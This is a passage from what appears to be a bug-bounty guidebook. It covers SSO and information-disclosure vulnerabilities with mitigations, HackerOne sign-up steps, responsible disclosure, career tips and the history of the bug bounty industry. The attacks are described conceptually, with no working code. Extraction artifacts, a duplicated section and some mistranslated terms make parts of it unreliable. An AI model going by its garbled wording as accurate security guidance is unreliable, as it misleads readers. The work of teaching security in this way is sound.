them to access their accounts.
- Token Reinjection Attack: An attacker intercepts a valid
SSO session token and reinjects it into his own browser. This
allows him to impersonate the legitimate user and access your
accounts without needing to know your credentials.
- Brute Force Attack against the IdP: An attacker uses a pro-
gram to try thousands of username and password combinations
until he finds one that works. If the IdP does not have adequate
protection measures, such as locking accounts after several fai-
led attempts, the attacker could gain access to users' accounts.
Mitigating SSO Security Risks
To protect against SSO security risks, it is crucial to imple-
ment the following security measures:
- Two-Factor Authentication (2FA): Requires users to pro-
vide a second factor of authentication, such as a code sent to
their cell phone, in addition to their password.
- Secure Session Management: Implements security mea-
sures to protect SSO sessions, such as short session timeouts
and session token regeneration after each login.
- Monitoring and Anomaly Detection: Use monitoring tools
to detect suspicious activity, such as failed login attempts or
access from unusual locations.
- Security Patching: Keep IdP software and linked
applications up to date with the latest security patches.

SSO offers great convenience, but it is important to be aware

of the security risks involved. By implementing the right measu-
res, you can minimize these risks and enjoy the benefits of SSO
without compromising the security of your data and systems.

web vulnerabilities 121

2 . 1 7 - I NFO R M ATI O N
D I SCLOSU R E # 2. 1 7
Imagine you are playing poker and you accidentally show
your cards to the other players. In the digital world, Information
Disclosure is like showing your cards: it reveals sensitive data
that should remain hidden, giving attackers an unfair advantage.
Information disclosure is a vulnerability that occurs when a
web application inadvertently discloses sensitive data to unau-
thorized users. This data can include technical information about
the application, configuration data, detailed error messages or
even user data.
Why is Information Disclosure Dangerous?
Although often considered a low-risk vulnerability, infor-
mation disclosure can have serious consequences:
- Reconnaissance: Attackers can use the disclosed informa-
tion to learn more about the application and its vulnerabilities,
facilitating future attacks.
- Privilege Escalation: Disclosed information can help atta-
ckers gain access to restricted areas of the application or ele-
vate their privileges.
- Targeted Attacks: Attackers can use the disclosed infor-
mation to launch more targeted and effective attacks.
- Reputation Damage: Disclosure of confidential informa-
tion can damage a company's reputation and erode the trust of
its customers.
Common Types of Information Disclosure
Detailed Error Messages: When an application encoun-
ters an error, it sometimes displays error messages that reveal
internal application details, such as file paths, variable names or
SQL queries. Attackers can use this information to identify and
exploit vulnerabilities.
122 MILLIONAIRE RECORDS
Example:
---------
Error connecting to database: Access denied for user
'root' on 'localhost' (using password: YES).
---------
2. Disclosure of Configuration Files: Configuration files
often contain sensitive information, such as database passwords,
API keys, or service account credentials. If these files are not pro-
perly protected, attackers can access them and use the informa-
tion to compromise the application.
3. Disclosure of Debugging Information: Debugging tools
can reveal detailed information about the inner workings of an
application, such as variable values, stack traces, and event logs.
If these tools are not disabled in production, attackers can use
them to obtain valuable information.
4. Metadata Disclosure: Metadata is data about data, such
as software version, operating system or HTTP headers. Attackers
can use this information to identify known vulnerabilities in the
software or to create targeted attacks.
How to Prevent Information Disclosure
To protect your application from information disclosure,
follow these best practices:
- Generic Error Messages: In production, display generic
error messages that do not reveal internal application details.
- Protect Configuration Files: Store configuration files out-
side of the web root folder and ensure that they are protected
with appropriate permissions.
- Disabling Debugging Tools: Disable all debugging tools
in production to prevent attackers from accessing sensitive
information.
- Metadata Removal: Removes unnecessary metadata from
files and HTTP headers to reduce the attack surface.
Information disclosure may seem like a minor vulnerability,
but it can have serious consequences for the security of your
application. By implementing the right security measures, you
can protect your data and systems from attackers and prevent
your secrets from getting out.

Endnotes

In this chapter, we have explored some of the most com-

mon and dangerous web vulnerabilities lurking in the vast digital
world. From code injection to information disclosure, we have
seen how attackers can exploit these flaws to compromise web
application security and steal sensitive data.

However, we should not despair. By understanding these

vulnerabilities and their exploitation mechanisms, we are bet-
ter equipped to protect ourselves. Implementing robust security
measures, such as input validation, query parameterization and
the use of security tools, can significantly reduce the risk of
falling victim to a cyberattack.

Remember, web security is an ongoing process, not a final

destination. As attackers develop new techniques, we must adapt
and strengthen our defenses. Staying up-to-date on the latest
threats and vulnerabilities is crucial to protecting your applica-
tions and your users.

If you are interested in becoming a bug bounty hunter, this

chapter has provided you with a solid foundation to get started;
now it's time to put what you've learned into practice and start
looking for vulnerabilities!

web vulnerabilities 123

 C H A P T E R T H R E E

BEYOND TECHNIC
3
HOW LOGGING
ON TO A WEB
CAN CHANGE
YOUR LIFE

126 MILLIONAIRE RECORDS

3 . 1 – BUG B OU N T Y P RO-
G R A M S # 3 .1
Welcome to the exciting world of bug bounty programs! If
you've made it this far, it means you're ready to take the
next step in your journey as an ethical hacker. In this chap
ter, I'll reveal the secrets to finding and participating in
bug bounty programs that will allow you to put your skills to
use, earn money and, who knows, maybe even become a
millionaire!

What are Bug Bounty Programs?

Bug bounty programs are initiatives in which companies

invite ethical hackers to look for vulnerabilities in their sys
tems and applications. In exchange for reporting these
security flaws in a responsible manner, companies offer
financial rewards that can range from a few dollars to thou
sands, or even millions, of dollars.

These programs are a win-win situation: companies improve

the security of their products, ethical hackers get recogni
tion and rewards for their work, and end users enjoy more
secure applications and services.

Why Should You Participate in Bug Bounty Programs?

Bug bounty programs offer a number of benefits for both

novice and expert hackers:

- Potential Gains: As I mentioned, the rewards can be very

generous, especially if you find critical vulnerabilities. Many
hackers have managed to turn bug bounty into their main
source of income, and some, like me, have even reached
millionaire status.
- Continuous Learning: Bug bounty programs expose you
to a wide variety of technologies and vulnerabilities, allowing
you to constantly learn and improve your skills.
- Recognition and Reputation: By finding and reporting
vulnerabilities, you can build a solid reputation in the com
puter security community, which will open doors to new
job opportunities and collaborations.
- Contribution to Society: By helping companies improve
the security of their products, you are helping to make the
Internet a safer place for everyone.

beyond T echnic 127

 How to Find Bug Bounty Programs

There are numerous platforms that connect ethical hackers

with companies offering bug bounty programs. One of the
most popular and respected is HackerOne.

HackerOne is a platform that hosts hundreds of bug bounty

programs from companies around the world. You can fil
ter programs by technology, reward, difficulty level and other
criteria to find those that match your interests and skills.

Other popular platforms include:

- Bugcrowd
- Intigriti
- YesWeHack

In addition to these platforms, many companies have their

own private bug bounty programs. You can find them by
searching the company's website or by contacting their
security team directly.

How to Choose the Right Bug Bounty Program

Not all bug bounty programs are the same. Some focus on
web applications, while others focus on desktop software
or mobile devices. Some offer higher rewards, but they can
also be more competitive.

To choose the right program for you, consider the following

factors:

- Your Interests and Skills: Are you more interested in web

applications, desktop software or mobile devices? What
technologies do you have the most experience in?

- The Scope of the Program: What kind of vulnerabilities is

the company looking for, and are there any restrictions on
the testing techniques you can use?

- The Reward: How much does the company pay for each
vulnerability found? Is there a maximum reward limit?

- The Program's Reputation: What do other hackers say

about the program? Does the company respond quickly
to vulnerability reports? Does it pay rewards on time?

128 MILLIONAIRE RECORDS

How to Participate in a Bug Bounty Program

Once you've found a program that interests you, the next

step is to register and carefully read the program rules. These
rules specify what types of vulnerabilities are within the
scope of the program, what testing techniques are allowed,
and how you should report your findings.

Once you are familiar with the rules, you can start looking
for vulnerabilities. Use the tools and techniques we have
seen in previous chapters, such as vulnerability scanners,
fuzzing, and manual code analysis.

When you find a vulnerability, be sure to document it clearly

and in detail. Include steps to reproduce the problem,
screenshots and any other relevant information. Then, sub
mit your report to the company via the bug bounty platform
or their responsible disclosure channel.

Tips to Maximize your Bug Bounty Profits

- Focus on Quality Programs: Not all bug bounty programs

are the same. Some offer better rewards and have a bet
ter payout history than others. Do your research and choose
reputable programs.

- Specialize in One Area: Instead of trying to cover every

thing, focus on one specific area, such as web applications,
desktop software or mobile devices. This will allow you
to develop greater expertise and find more complex
vulnerabilities.

- Learn Constantly: Technology evolves rapidly, and so do

vulnerabilities. Keep up with the latest hacking trends and
techniques to stay competitive.

- Collaborate with Other Hackers: The bug bounty is not

a competition, but a community. Collaborating with other
hackers can help you learn new techniques, share informa
tion and find vulnerabilities faster.

- Be Professional and Responsible: Report your findings

clearly and concisely, and work with the company to fix pro
blems responsibly. This will help you build a good repu
tation and get more invitations to private programs.

beyond T echnic 129

 Conclusion: Your Future in Bug Bounty

Bug bounty is an exciting and growing industry. If you have

a passion for technology, security and troubleshooting,
bug bounty may be the perfect career for you.

With dedication, perseverance and the right tools, you can

become a successful bounty hunter and help make the
Internet a safer place for everyone.

M Y A D V IC ES
HackerOne: your gateway to the world of bug bounty. You
will learn how to register, find programs, report vulnerabili
ties and earn money. Santiago advises you to start with
small programs, be patient, ethical and responsible.

Here are specific steps on how you can start changing

your life.

1. Access HackerOne's website: Open your web brow-

ser and go to HackerOne's home page: https://www.
hackerone.com/.
2. Click on "Sign Up": In the top right corner of the page,
you will find a button that says "Sign Up". Click on it.
3. Choose your account type: You will be presented with
two options: "Hacker" (for security researchers) and
"Company" (for companies). Select "Hacker".
4. Complete the registration form: Enter your email address
and create a secure password. Accept HackerOne's
terms of service and privacy policy.
5. Verify your email: HackerOne will send you a verifica-
tion email. Open the email and click on the verification
link to confirm your account.
6. Complete your profile: Once you have verified your
email, you will be asked to complete your HackerOne
profile. This includes information such as your name,
country of residence and hacking skills.
7. Join bug bounty programs: Now that you have a
HackerOne account, you can start searching for and
joining bug bounty programs. You can explore availa-
ble programs on HackerOne's programs page: [invalid
URL removed].

130 MILLIONAIRE RECORDS

Additional Tips:

- Read the program rules: Before joining a program, be sure

to carefully read the program rules. These rules specify
what types of vulnerabilities are within the scope of the
program, what testing techniques are allowed, and how
you should report your findings.

- Start with smaller programs: If you are new to bug bounty,

it is advisable to start with smaller, less competitive pro
grams. This will allow you to gain experience and build your
reputation before taking on larger, more challenging
programs.

- Be patient and persistent: Finding vulnerabilities can take

time and effort. Don't get discouraged if you don't find
anything right away. Keep learning and practicing, and
eventually you will succeed.

- Be ethical and responsible: Always report your findings

responsibly to the company through the bug bounty plat
form. Don't try to exploit vulnerabilities for your own
benefit.

beyond T echnic 131

3.2 - RESPONSIBLE COMMUNICATION
AND DISCLOSURE #3.2
In the fast-paced world of cybersecurity, where threats
are constantly evolving, responsible vulnerability communica-
tion and disclosure stand as fundamental pillars for building a
more secure and resilient digital environment. This chapter will
explore the crucial importance of sharing vulnerability informa-
tion in an ethical and constructive manner, safeguarding users
and fostering collaboration between security researchers, busi-
nesses and the community at large.

Why is Responsible Disclosure Essential?

Imagine discovering a critical flaw in widely used software,

an open door for cybercriminals to exploit and wreak havoc. What
would you do with that knowledge? Disclosing it irresponsibly,
without giving developers time to fix it, could unleash a wave of
devastating attacks. On the other hand, keeping it secret would
perpetuate the risk and leave users exposed.

Responsible disclosure offers a balanced solution. By pri-

vately informing developers about vulnerabilities, we give them
the opportunity to create patches and updates before the infor-
mation is made public. This minimizes risk to users and ensu-
res that fixes are available when the vulnerability is disclosed.

The Responsible Disclosure Process

- Discovery: A security researcher, whether a seasoned pro-

fessional or a passionate enthusiast, identifies a vulnerability in
a system or software.

- Private Notification: The researcher informs the software

vendor of the vulnerability through appropriate channels, pro-
viding comprehensive technical details and proof of concept
demonstrating the existence and impact of the flaw.
- Grace Period: A reasonable period of time, agreed between
the researcher and the vendor, is established for the latter to
develop and rigorously test a patch to fix the vulnerability.
- Coordinated Disclosure: Once the patch is available and
has been implemented, the researcher and the vendor jointly
disclose the vulnerability to the public. This disclosure includes
detailed information about the vulnerability, its potential impact,
and steps users can take to protect themselves, such as applying
the patch or updating the software.

132 MILLIONAIRE RECORDS

 ARGENTINE TALENT
SANTIAGO LOPEZ IS A YOUNG ARGENTINE ETHICAL HACKER WHO BECAME A MILLIO-
NAIRE BY FINDING AND REPORTING VULNERABILITIES IN COMPUTER SYSTEMS TO
COMPANIES LIKE GOOGLE, ZOOM, VERIZON AND EVEN THE U.S. GOVERNMENT.

beyond T echnic 133

 x Responsible communication and disclosure of vulnerabili-
Benefits of Responsible Disclosure
- Protecting Users: Allowing vendors to address vulnerabi-
lities before they are exploited significantly reduces the risk of
attacks and safeguards users' security.
- Trust Building: Responsible disclosure demonstrates the
commitment of researchers and companies to user security, bui-
lding a relationship of trust and collaboration.
- Continuous Security Improvement: By working together,
researchers and vendors can identify and fix vulnerabilities more
efficiently, improving the overall security of software and systems.
- Recognition and Rewards: Many bug bounty programs,
also known as "bug bounty," recognize and financially reward
researchers who responsibly disclose vulnerabilities, encoura-
ging research and collaboration.
Bug Bounty Programs: A Key Incentive
Bug bounty programs are a powerful tool for encouraging
responsible disclosure. These programs offer financial rewards to
researchers who find and report vulnerabilities privately to com-
panies. This not only incentivizes researchers to find and report
flaws, but also ensures that vulnerabilities are addressed quickly
and efficiently, protecting users and improving overall security.
It's Vital to Report Vulnerabilities to Bug Bounty Programs!
If you discover a vulnerability, it is crucial that you report it
immediately to the appropriate bug bounty program. By doing
so, you directly contribute to improving the security of the sof-
tware and protect users from possible attacks. In addition, you
may be rewarded for your valuable contribution.
Ethical Considerations and Challenges
Responsible disclosure is not without its challenges. Vendors
can sometimes be slow to respond or reluctant to acknowledge
vulnerabilities. There are also ethical dilemmas about when and
how to disclose information that could be used for malicious
purposes.
It is critical that researchers act with integrity and responsi-
bility, always prioritizing the safety of users and avoiding causing
unnecessary harm. Open and transparent communication with
vendors is essential to build trusting relationships and achieve
positive results.
134 MILLIONAIRE RECORDS
ties are indispensable tools for strengthening cybersecurity in an
increasingly connected world. By working together, researchers,
companies and the community can create a more secure and
resilient digital environment, where vulnerabilities are addres-
sed proactively and efficiently, protecting users and fostering
innovation. Remember, reporting vulnerabilities to bug bounty
programs is vital to achieving this goal!
3.2 - RESPONSIBLE COMMUNICATION
AND DISCLOSURE #3.2
In the fast-paced world of cybersecurity, where threats are
constantly evolving, responsible vulnerability communication
and disclosure stand as key pillars for building a more secure
and resilient digital environment. This chapter will explore the
crucial importance of sharing vulnerability information in an ethi-
cal and constructive manner, safeguarding users and fostering
collaboration between security researchers, businesses and the
community at large.
Why is Responsible Disclosure Essential?
Imagine discovering a critical flaw in widely used software,
an open door for cybercriminals to exploit and wreak havoc. What
would you do with that knowledge? Disclosing it irresponsibly,
without giving developers time to fix it, could unleash a wave of
devastating attacks. On the other hand, keeping it secret would
perpetuate the risk and leave users exposed.
Responsible disclosure offers a balanced solution. By pri-
vately informing developers about vulnerabilities, we give them
the opportunity to create patches and updates before the infor-
mation is made public. This minimizes risk to users and ensu-
res that fixes are available when the vulnerability is disclosed.
The Responsible Disclosure Process
1. Discovery: A security researcher, whether a seasoned
professional or a passionate enthusiast, identifies a vulnerabi-
lity in a system or software.
2. Private Notification: The researcher informs the software
vendor of the vulnerability through appropriate channels, pro-
viding comprehensive technical details and proof of concept
demonstrating the existence and impact of the flaw.
3. Grace Period: A reasonable period of time, agreed
between the researcher and the vendor, is established for the
latter to develop and rigorously test a patch to fix the vulnerability.
4. Coordinated Disclosure: Once the patch is available and
has been implemented, the researcher and the vendor jointly
disclose the vulnerability to the public. This disclosure includes
detailed information about the vulnerability, its potential impact,
and steps users can take to protect themselves, such as applying
the patch or updating the software.
Benefits of Responsible Disclosure
- Protecting Users: Allowing vendors to address vulnerabi-
lities before they are exploited significantly reduces the risk of
attacks and safeguards users' security.
- Building Trust: Responsible disclosure demonstrates the
commitment of researchers and companies to user security, bui-
lding a relationship of trust and collaboration.
- Continuous Security Improvement: By working together,
researchers and vendors can identify and fix vulnerabilities more
efficiently, improving the overall security of software and systems.
- Recognition and Rewards: Many bug bounty programs,
also known as "bug bounty," recognize and financially reward
researchers who responsibly disclose vulnerabilities, encoura-
ging research and collaboration.
Bug Bounty Programs: A Key Incentive
Bug bounty programs are a powerful tool for encouraging
responsible disclosure. These programs offer financial rewards to
researchers who find and report vulnerabilities privately to com-
panies. This not only incentivizes researchers to find and report
flaws, but also ensures that vulnerabilities are addressed quickly
and efficiently, protecting users and improving overall security.
If you discover a vulnerability, it is crucial that you report it
immediately to the appropriate bug bounty program. By doing
so, you directly contribute to improving the security of the sof-
tware and protect users from potential attacks. In addition, you
can be rewarded for your valuable contribution.
How to Responsibly Report Vulnerabilities to Companies and
Collaborate in their Solution
Identification and Analysis: Confirm the existence of the vul-
nerability and document all technical details, including steps to
reproduce it, proofs of concept and possible solutions. Evaluate
the potential impact of the vulnerability.
2. Private Notification: Use the company's official commu-
nication channels, such as the vulnerability disclosure program
or bug bounty program, to report the vulnerability privately.
3. Clear and Concise Communication: Write a detailed and
technical report, but easy to understand for the company's deve-
lopers. Include all the information necessary for them to repro-
duce and fix the vulnerability.
4. Collaboration: Maintain open and transparent commu-
nication with the company. Answer their questions, provide
additional information if necessary and work together to find
the best possible solution.
5. Coordinated Disclosure: Establish a reasonable timeline
with the company for public disclosure of the vulnerability once
it has been fixed. Prepare a public notice explaining the vulne-
rability and how users can protect themselves.
Ethical Considerations and Challenges
Responsible disclosure is not without its challenges. Vendors
can sometimes be slow to respond or reluctant to acknowledge
vulnerabilities. There are also ethical dilemmas about when and
how to disclose information that could be used for malicious
purposes.
It is critical that researchers act with integrity and responsi-
bility, always prioritizing the safety of users and avoiding causing
unnecessary harm. Open and transparent communication with
vendors is essential to build trusting relationships and achieve
positive results.
Responsible communication and disclosure of vulnerabili-
ties, along with active participation in bug bounty programs, are
indispensable tools for strengthening cybersecurity in an increa-
singly connected world. By working together, researchers, com-
panies and the community can create a more secure and resilient
digital environment, where vulnerabilities are addressed proac-
tively and efficiently, protecting users and fostering innovation.
3.3 - BUILDING A CAREER IN BUG BOUN-
TY: FROM PASSION TO PROFESSION
#3.3
The world of bug bounty (bug bounty programs) offers an
exciting opportunity to turn your passion for cybersecurity into
a rewarding and lucrative career. This chapter will explore the
key steps to building a successful career in this evolving field,
from developing your technical skills to establishing your repu-
tation and maximizing your income.
beyond T echnic 135
 x companies to get a fair reward for your findings. Research the
1. Develop Your Technical Skills: usual pay ranges for each type of vulnerability.

- Master the Fundamentals: Start by acquiring a solid unders- - Diversify your income: In addition to bug bounty, consi-
tanding of cybersecurity fundamentals, such as networks, ope- der other sources of income such as security consulting, training,
rating systems, programming languages and web protocols. security tool development or content creation.

- Specialize in Key Areas: Explore different areas of cyberse-
curity, such as penetration testing, vulnerability analysis, reverse
engineering and web application security, to identify your areas
of interest and specialization.
- Stay current: Cybersecurity is a constantly evolving field.
Spend time learning new techniques, tools and trends through
online courses, conferences, blogs and security communities.
- Practice Consistently: Practice is key to honing your skills.
Participate in ethical hacking platforms such as Hack The Box,
TryHackMe and PortSwigger Web Security Academy to test your
knowledge in secure and controlled environments.
2. Build your Reputation:
Santiago's Tips on How to Turn Your Passion for Security into
a Successful Career:
- Be Curious and Persistent: Curiosity and persistence are
essential to succeed in the bug bounty world. Never stop lear-
ning and exploring new areas of security.
- Be Ethical and Responsible: Always act with integrity
and ethics. Report vulnerabilities responsibly and avoid causing
unnecessary damage.
- Be Collaborative and Share your Knowledge: Collaborate
with other researchers, share your knowledge and learn from
others. The security community is a valuable resource for your
professional growth.

- Participate in Bug Bounty Programs: Start by participating
in public and private bug bounty programs. Report your findings
in a responsible and professional manner, following the disclo-
sure guidelines of each program.
- Share your Knowledge: Write detailed reports on the
vulnerabilities you discover, create educational content (blogs,
videos, tutorials) and participate in online communities to share
your knowledge and experiences.
- Be Patient and Perseverant: Building a successful bug
bounty career takes time and effort. Don't be discouraged by
obstacles and keep working hard to achieve your goals.
Building a career in bug bounty requires dedication, pas-
sion and a constant commitment to learning and improvement.
By following these tips and developing your skills, you can turn
your passion for security into a rewarding career and contribute
to a safer digital world.

- Build your Personal Brand: Create a personal website or

blog to showcase your skills and accomplishments, and use social
media to connect with other security professionals.

Maximize your Income:

- Focus on Profitable Programs: Research and select bug

bounty programs that offer attractive rewards and fit your areas
of expertise.

- Prioritize Quality over Quantity: Instead of reporting a

large number of minor vulnerabilities, focus on finding critical,
high-impact vulnerabilities that generate higher rewards.

- Negotiate your Rewards: Don't be afraid to negotiate with

136 MILLIONAIRE RECORDS

beyond T echnic 137
3.4 - BUG BOUNTY FUTURE #3.4
The cybersecurity landscape is constantly evolving, and with
it, the world of bug bounty programs. This episode will explore
the emerging trends that are shaping the future of this growing
industry, as well as insights from Santiago Lopez, a renowned
security expert and bounty hunter, on the challenges and oppor-
tunities ahead.
Emerging Trends in Bug Bounty
1. Automation and Machine Learning: Artificial intelligence
and machine learning are transforming the way vulnerabilities
are discovered and reported. Automated tools can scan large
amounts of code for patterns and anomalies, speeding up the
process of identifying vulnerabilities. However, the human touch
is still essential to analyze and validate findings.
2. Focus on Supply Chain Security: As enterprises increa-
singly rely on third-party software and services, supply chain
security becomes critical. Bug bounty programs are expanding
their scope to include assessing the security of external suppliers
and partners.
3. Bug Bounty in the Cloud: The widespread adoption of
cloud computing has created new attack vectors and potential
vulnerabilities. Bug bounty programs are adapting to address
cloud-specific risks, such as misconfiguration of services, data
exposure, and vulnerabilities in application programming inter-
faces (APIs).
4. Rewards for High-Impact Vulnerabilities: Enterprises are
willing to pay higher rewards for critical vulnerabilities that could
have a significant impact on their operations or the security of
their customers. This incentivizes researchers to focus on fin-
ding high-risk vulnerabilities.
5. Gamification and Collaboration: Bug bounty programs
are incorporating gamification elements, such as leaderboards
and challenges, to motivate researchers and encourage heal-
thy competition. In addition, collaborative platforms are being
created that allow researchers to work together to discover and
report vulnerabilities more efficiently.
138 MILLIONAIRE RECORDS
Santiago's Reflections on the Future of the Industry
- The Rise of Specialization: As the threat landscape beco-
mes more complex, security researchers are specializing in spe-
cific areas, such as mobile application security, cloud security, or
IoT device security. This specialization allows for deeper analysis
and identification of more sophisticated vulnerabilities.
- The Importance of Ethics: Ethics and responsibility are
fundamental in the world of bug bounty. Researchers must act
with integrity, respect the privacy of users and work collabo-
ratively with companies to ensure that vulnerabilities are pro-
perly addressed.
- The Role of the Community: The security research com-
munity plays a crucial role in the evolution of bug bounty pro-
grams. Collaboration, knowledge sharing and mutual support are
essential to the growth and success of this industry.
- The Challenge of Scale: As companies adopt bug bounty
programs, the challenge lies in managing and scaling these pro-
grams effectively. Companies must establish clear processes,
invest in automation tools and foster a culture of security to
take full advantage of the benefits of bug bounty.
- The Future of Rewards: Financial rewards will continue
to be an important incentive for researchers, but other forms of
recognition will also be explored, such as prestige, the opportu-
nity to collaborate with leading companies and access to exclu-
sive resources.
The future of bug bounty programs is promising, with
new trends emerging that are transforming the way companies
approach security. Collaboration between researchers, companies
and the community at large will be key to meeting the challenges
and seizing the opportunities that lie ahead in this exciting field.
beyond T echnic 139
4
C H A P T E R F O U R

LET'S GET TO
WORK
CHOOSING THE RIGHT PROGRAM IS LIKE FINDING
TREASURE: IT REQUIRES A LITTLE RESEARCH, INTUITION
AND A LITTLE COURAGE. NOT EVERY PROGRAM WILL LOOK
AMAZING TO YOU, SO LOOK FOR THE ONE THAT WILL MAKE
YOU THE MOST MONEY.

142 MILLIONAIRE RECORDS

"¿HOW TO
CHOOSE THE
RIGHT PRO-
GR AM?"
4. 1 – CH O O S I NG A BUG
B OUN T Y P R O G R A M # 4 .1
In the vast universe of Bug Bounty programs, choosing the
right one can be the difference between a rewarding experience
and a frustrating one. This chapter will guide you through the
key factors to consider when selecting a program, maximizing
your chances of success and satisfaction.
1. Define your Objectives:
- What are you looking to achieve; do you want to earn
money, gain experience, build your reputation, or contribute to
the security of a specific project?
- What are your skills: Are you an expert in web security,
mobile applications, cloud infrastructure or IoT devices?
- How much time can you dedicate - can you devote full
time or just a few hours a week?
2. Research Available Programs:
- Bug Bounty Platforms: Explore platforms such as
HackerOne, Bugcrowd, Intigriti and YesWeHack. These plat-
forms offer a wide variety of programs from different companies
and sectors.
- Private Programs: Some companies have private programs
that are not listed on public platforms. Research companies that
interest you and look for information about their Bug Bounty
let ' s get to work 143
programs on their websites or social media.
- Public Programs: Many programs are public and acces-
sible to any researcher. These programs tend to be more com-
petitive, but also offer the opportunity to earn recognition and
significant rewards.
3. Evaluate Programs:
- Scope: What assets are included in the program - websi-
tes, mobile apps, APIs, cloud infrastructure?
- Rules: What are the program rules? What types of vul-
nerabilities are eligible for rewards? Are there restrictions on
testing techniques?
- Rewards: What kind of rewards are offered: cash, swag,
reputation points, public recognition? What is the range of
rewards for different types of vulnerabilities?
- Communication: How does the company communicate
with researchers, is there a clear and transparent communication
channel, and do they respond quickly to vulnerability reports?
- Reputation: What is the company's reputation in the Bug
Bounty community? Do they pay rewards on time? Do they
recognize the work of researchers?
4. Prioritize Programs:
- Alignment with your goals: Choose programs that align
with your goals and skills. If you are a web security expert, look
for programs that focus on web applications.
- Reward potential: Prioritize programs that offer attractive
rewards and match your expectations.
- Communication and transparency: Choose programs that
have good communication with researchers and are transparent
about their rules and processes.
- Reputation: Prioritize programs from companies with a
good reputation in the Bug Bounty community.
5. Start Looking for Vulnerabilities:
- Read the program documentation: Familiarize yourself
with the program's rules, scope and rewards.
144 MILLIONAIRE RECORDS
- Use appropriate tools and techniques: Use vulnerability
scanning tools, fuzzers and other testing techniques to identify
potential vulnerabilities.
- Report your findings responsibly: Follow the program's dis-
closure guidelines and report your findings clearly and concisely.
Additional Tips:
- Don't be discouraged: Finding vulnerabilities can be a
long and tedious process. Don't give up if you don't find any-
thing right away.
- Learn from your mistakes: If your reports are rejected,
learn from your mistakes and improve your skills.
- Collaborate with other researchers: Working in a team
can be a great way to learn and improve your skills.
- Keep up to date: Cybersecurity is constantly evolving. Stay
up to date on the latest trends and techniques.
Choosing the right Bug Bounty program is a crucial step in
building a successful career in this field. By following these tips,
you can maximize your chances of success and contribute to a
more secure digital environment.
4.2 – INDUSTRY HIS-
T ORY # 4 .2
From Early Steps to Professionalization
The concept of rewarding people for finding bugs in sof-
tware is not new, but the bug bounty industry as we know it
today has undergone a fascinating evolution over the decades.
This chapter will take you on a journey through time, from the
first informal programs to the professionalization and global
recognition of this practice.
Early Origins: Pioneers and Experimenters
The idea of rewarding those who discover bugs in sof-
tware dates back to the early days of computing. In the 1980s,
companies such as Hunter & Ready offered rewards for finding
bugs in their VRTX operating system. However, these programs
were informal and did not resemble the structured programs
we know today.
In 1995, Netscape launched a bug bounty program in its
Netscape Navigator 2.0 Beta browser, considered by many to
be the first modern bug bounty program. This program offered
cash rewards to those who found security vulnerabilities, set-
ting a precedent for future initiatives.
The Rise of Bug Bounty: The Era of Professionalization
In the early 2000s, the bug bounty concept began to gain
popularity. Companies such as Google, Mozilla and Microsoft
launched their own programs, offering increasingly generous
bounties for critical vulnerabilities.
In 2012, the HackerOne platform was founded, which revo-
lutionized the industry by providing a centralized platform for
companies to manage their bug bounty programs and security
researchers to find and report vulnerabilities. Other platforms
such as Bugcrowd and Intigriti followed suit, creating a vibrant
ecosystem for the bug bounty community.
Industry Maturity: Recognition and Growth
Over the past decade, the bug bounty industry has experien-
ced exponential growth. More and more companies are recog-
nizing the value of bug bounty as an effective way to improve
the security of their products and services.
Bug bounty programs have expanded beyond software and
now encompass a wide range of assets, from hardware and IoT
devices to cloud infrastructure and industrial systems. Bounties
have also increased significantly, with some companies offering
millions of dollars for critical vulnerabilities.
The Future of Bug Bounty: Challenges and Opportunities
As the bug bounty industry continues to evolve, new
challenges and opportunities arise. Automation and artificial
intelligence are transforming the way vulnerabilities are discove-
red and reported, while the increasing complexity of systems and
proliferation of connected devices pose new risks and challenges.
Collaboration between companies, security researchers
and governments will be essential to ensure that bug bounty
programs remain effective and relevant in the future. Education
and training will also play a crucial role in developing the next
generation of cybersecurity talent.
The story is a testament to the power of collaboration and
innovation in the quest for a more secure digital environment.
From its humble beginnings to its current status as a recognized
and valued practice, bug bounty has proven to be an invaluable
tool for improving the security of our systems and protecting
users from cyber threats. As we move into the future, the bug
bounty industry will continue to play a crucial role in protecting
our ever-evolving digital world.
4 .3 – ASSET S #4 .3
The types of assets you may encounter are as diverse as the
vulnerabilities lurking in cyberspace. This chapter will immerse
you in a tour of the different types of assets typically included in
these programs, broadening your horizons and revealing a range
of possibilities for your skills as a security researcher.
1. Web applications:
Web applications are one of the most common targets in
Bug Bounty programs. They range from simple informational
websites to complex e-commerce and social networking pla-
tforms. The most frequent vulnerabilities in this area include:
- SQL Injection (SQLi): allows attackers to manipulate SQL
queries to access sensitive data or modify the database.
- Cross-Site Scripting (XSS): Allows malicious code to be
injected into web pages and then executed in users' browsers.
- Cross-Site Request Forgery (CSRF): Forces authenticated
users to perform unwanted actions in a web application.
- Authentication and Authorization Vulnerabilities: Allow
attackers to bypass access controls and obtain unauthorized
privileges.
2. Mobile Applications:
With the rise of mobile devices, mobile applications have
become an attractive target for cybercriminals. Common vulne-
rabilities in this area include:
- Code Injection: allowing attackers to execute malicious
code in the application.
let ' s get to work 145
 - Insecure Data Storage Issues: Exposes sensitive data, such
as passwords or personal information, to potential attackers.
- Insecure Communication: Transmits sensitive data unen-
crypted, making it vulnerable to interception.
- Vulnerabilities in Third-Party Components: Libraries
or frameworks used in the application may contain known
vulnerabilities.
3. APIs (Application Programming Interfaces):
APIs are the glue that connects different applications and
services. Common vulnerabilities in APIs include:
- Parameter Injection: allows attackers to manipulate the
parameters of API requests to access unauthorized data or per-
form unwanted actions.
- Weak Authentication and Authorization: Allow attackers
to access protected resources without proper authorization.
- Excessive Data Exposure: Reveals sensitive information
that is not necessary for API operation.
- Lack of Resource Control: Allows attackers to consume
excessive resources and cause a denial of service.
4. Cloud Infrastructures:
The massive adoption of cloud computing has created new
security challenges. Common vulnerabilities in cloud environ-
ments include:
- Misconfiguration of Cloud Services: Misconfiguration of
firewalls, object storage or identity services can expose sensi-
tive data or allow unauthorized access.
- Container Vulnerabilities: Containers, such as Docker,
may contain vulnerabilities in the underlying software or be
misconfigured.
- Denial of Service (DoS) Attacks: Attackers may attempt
to overload cloud resources to disrupt services.
146 MILLIONAIRE RECORDS
5. IoT Hardware and Devices:
The Internet of Things (IoT) has connected a wide range of
devices to the Internet, from home appliances to medical devi-
ces. Common vulnerabilities in IoT hardware and devices include:
- Vulnerable Firmware: Outdated or poorly designed fir-
mware can contain vulnerabilities that allow attackers to take
control of the device.
- Weak or Encrypted Credentials: Weak passwords or
encrypted credentials in firmware facilitate unauthorized access
to devices.
- Insecure Communication: Unencrypted data transmis-
sion between IoT devices and servers can expose sensitive
information.
6. Other Assets:
In addition to those mentioned above, Bug Bounty pro-
